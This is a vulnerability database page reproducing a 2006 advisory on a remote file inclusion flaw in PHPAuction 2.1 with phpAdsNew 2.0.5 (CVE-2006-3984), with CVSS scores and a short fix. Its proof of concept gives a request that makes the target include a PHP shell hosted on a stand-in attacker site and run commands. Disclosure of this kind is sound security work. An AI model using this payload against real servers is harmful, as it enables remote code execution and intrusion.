Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
PHPAuction 2.1 (maybe higher) with phpAdsNew 2.0.5 RFI
2006.08.07
Credit:
Philipp Niedziela
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2006-3984
CWE:
CWE-98
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
+-------------------------------------------------------------------- + + PHPAuction 2.1 with phpAdsNew 2.0.5 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: PHPAuction 2.1 (maybe higher) with phpAdsNew, + phpAdsNew 2.0.5 (maybe higher) + Venedor ...........: http://www.phpauction.net, + http://phpadsnew.com + Class .............: Remote File Inclusion in /phpAdsNew/view.inc.php + Risk ..............: high (Remote File Execution) + Found by ..........: Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/sicherheit_264.htm + Contact ...........: webmaster[at]bb-pcsecurity[.]de + +-------------------------------------------------------------------- + + Code /phpAdsNew/view.inc.php: + + ..... + // Include required files + require ("$phpAds_path/dblib.php"); + require ("$phpAds_path/lib-expire.inc.php"); + ..... + +-------------------------------------------------------------------- + + $phpAds_path is not properly sanitized before being used. + +-------------------------------------------------------------------- + + Solution: + Declare $phpAds_path before using. + +-------------------------------------------------------------------- + PoC: + Place a PHPShell on a remote location: + http://evilsite.com/dblib.php/index.html + + http://[target]/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/d blib.php/&cmd=ls + +-------------------------------------------------------------------- + + Greets: + Krini&Lenni + +-------------------------[ E O F ]----------------------------------
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top